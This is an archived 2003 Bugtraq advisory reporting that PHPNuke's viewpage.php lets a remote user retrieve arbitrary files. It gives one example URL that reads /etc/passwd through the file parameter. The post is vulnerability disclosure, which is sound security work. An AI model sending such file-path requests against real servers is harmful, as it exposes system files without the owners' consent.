[29463] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

PHPNuke viewpage.php allows Remote File retrieving

daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)
Tue Mar 25 12:56:45 2003

Date: 25 Mar 2003 16:32:07 -0000
Message-ID: <20030325163207.13063.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com



viewpage.php is a part of PHPNuke.
The Script allows an attacker to view all files on the System.

Example:

http://server.com/viewpage.php?file=/etc/passwd


Zero X member of www.Lobnan.de


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[29463] in bugtraq

PHPNuke viewpage.php allows Remote File retrieving

daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)Tue Mar 25 12:56:45 2003

daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)
Tue Mar 25 12:56:45 2003